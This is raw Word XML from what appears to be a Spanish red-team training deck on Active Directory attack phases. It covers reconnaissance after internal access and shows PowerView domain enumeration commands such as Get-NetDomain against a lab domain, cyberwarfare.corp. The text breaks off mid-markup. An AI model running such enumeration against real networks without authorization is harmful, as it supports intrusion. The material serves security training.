                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>4.3 Explotaci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n de fases de Active Directory</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="58547692" id="Group 478" o:spid="_x0000_s1246" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:102.75pt;z-index:15823872;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 479" o:spid="_x0000_s1247" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 480" o:spid="_x0000_s1248" type="#_x0000_t202" style="position:absolute;width:121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775DC1E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="389"/>
                          <w:ind w:left="2749"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>4.3 Explotaci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n de fases de Active Directory</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0C749D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E28EB1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="305"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B88E641" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="732" w:right="8562" w:hanging="195"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485410304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F692F4E" wp14:editId="61489B3A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>27336</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-207175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12164695" cy="4144645"/>
                <wp:effectExtent l="0" t="0" r="0" b="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4695" cy="4144645"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12164695" cy="4144645"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="482" name="Image 482"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId226" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12164663" cy="4144092"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="483" name="Image 483"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId227" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="135731" y="164722"/>
                            <a:ext cx="11865864" cy="3828288"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="25D8CFE7" id="Group 481" o:spid="_x0000_s1026" style="position:absolute;margin-left:2.15pt;margin-top:-16.3pt;width:957.85pt;height:326.35pt;z-index:-17906176;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="121646,414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">
                <v:shape id="Image 482" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:121646;height:4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">
                  <v:imagedata r:id="rId228" o:title=""/>
                </v:shape>
                <v:shape id="Image 483" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1357;top:1647;width:118658;height:3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">
                  <v:imagedata r:id="rId229" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ciclo de simulación de ataques de red interna</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6302C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A2B252" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1237"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1237" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reconocimiento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FBF51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7B63DD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1957"/>
        </w:tabs>
        <w:ind w:left="1957" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ya tenemos acceso al entorno interno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB2DC2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="122"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67B53104" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1958" w:right="2279" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Las credenciales de un usuario se encuentran en el servidor web, que nos dio acceso a la máquina del empleado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2646AA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="82"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3071A3ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1957"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1957" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Las funcionalidades incorporadas, como PowerShell y WMI, se pueden utilizar para</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA8F78" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1958"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>concienciación en la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344EB64D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="119"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB47B4B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1958"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1958" w:right="1079" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El adversario siempre se dirige a la dirección de colocación o configuración de activos críticos de una empresa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAC57D"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1000" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A70CB3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:spacing w:line="645" w:lineRule="exact"/>
        <w:ind w:left="1047" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumeración de dominios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F0305" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F43C869" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066C25B6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="232"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487684096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3977DC62" wp14:editId="464E6D0C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>53281</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>317636</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12071985" cy="4188460"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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71985" cy="4188460"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12071985" cy="4188460"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="485" name="Image 485"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId230" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12071720" cy="4188069"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="486" name="Image 486"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId231" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="164650" y="164663"/>
                            <a:ext cx="11756136" cy="3872484"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5C528E34" id="Group 484" o:spid="_x0000_s1026" style="position:absolute;margin-left:4.2pt;margin-top:25pt;width:950.55pt;height:329.8pt;z-index:-15632384;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="120719,418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">
                <v:shape id="Image 485" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:120717;height:4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">
                  <v:imagedata r:id="rId232" o:title=""/>
                </v:shape>
                <v:shape id="Image 486" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:1646;top:1646;width:117561;height:3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">
                  <v:imagedata r:id="rId233" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEF681E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1100" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="647A3F28" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1957"/>
        </w:tabs>
        <w:spacing w:before="55"/>
        <w:ind w:left="1957" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Usaremos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId234">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>PowerView</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">para la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>enumeración</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5CFE7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1957"/>
        </w:tabs>
        <w:spacing w:before="33"/>
        <w:ind w:left="1957" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Obtener el dominio actual :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659599BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="232"/>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84608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49BA5035" wp14:editId="0BA3DBD9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3319271</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>323167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6297295" cy="1010919"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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295" cy="1010919"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="64F50E8E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="225"/>
                              <w:ind w:left="271" w:right="718"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetDomain</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="283C388D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="125"/>
                              <w:ind w:left="271"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t>Get-NetDomain –Dominio cyberwarfare.corp</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
